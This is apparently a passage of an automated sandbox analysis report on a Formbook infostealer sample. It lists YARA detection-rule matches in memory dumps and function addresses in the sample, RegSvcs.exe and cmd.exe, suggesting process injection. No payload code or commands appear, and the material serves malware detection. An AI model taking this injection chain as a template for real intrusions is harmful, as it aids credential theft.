Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2068
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA4190
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA28D0
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA28CE
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2059
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2510
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA6D08
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2501
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2ACF
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA0388
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA037A
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2B0F
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_054CE5CA
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_054CE5D8
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_054CBC34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041C94A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041BB99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F7B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01021002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01031D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F60D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F86E30
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008748E6
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00895CEA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00879CF0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087D803
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087E040
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00877190
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008931DC
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00893506
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00886550
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00881969
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00878AD7
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00875226
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087FA30
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00875E70
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00885FC8
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00896FF0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087CB48
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035DEBB0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035C6E30
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03671D55
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035AF900
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035A0D20
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035C4120
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BD5E0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035B841F
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03661002
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BB090
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 035AB150 appears 32 times